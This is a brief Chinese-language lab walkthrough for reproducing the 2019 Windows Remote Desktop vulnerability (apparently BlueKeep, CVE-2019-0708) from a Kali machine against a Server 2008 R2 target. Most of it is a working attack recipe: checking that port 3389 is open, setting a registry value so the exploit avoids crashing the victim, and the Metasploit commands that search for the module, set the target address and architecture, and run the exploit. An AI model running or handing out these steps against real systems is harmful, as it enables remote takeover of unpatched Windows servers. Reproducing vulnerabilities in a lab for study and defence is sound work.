影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的
环境:
攻击机kali2020
靶机Server2008 R2
攻击条件需要对方开启3389远程桌面
查看3389是否正常启动 netstat -an
修改注册表(win键+R 搜索regedit打开注册表)
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam] 复现这个漏洞必须注意:值修改为0才能稳定利用,不然极容易把受害机攻击到蓝屏
启动msfconsole
搜索漏洞模块
search 0708
use 3 #使用第三个模块
set rhosts 192.168.3.138 #设置目标地址
set target 2 #set target (0-4) 设置受害机及其架构
exploit #运行
成功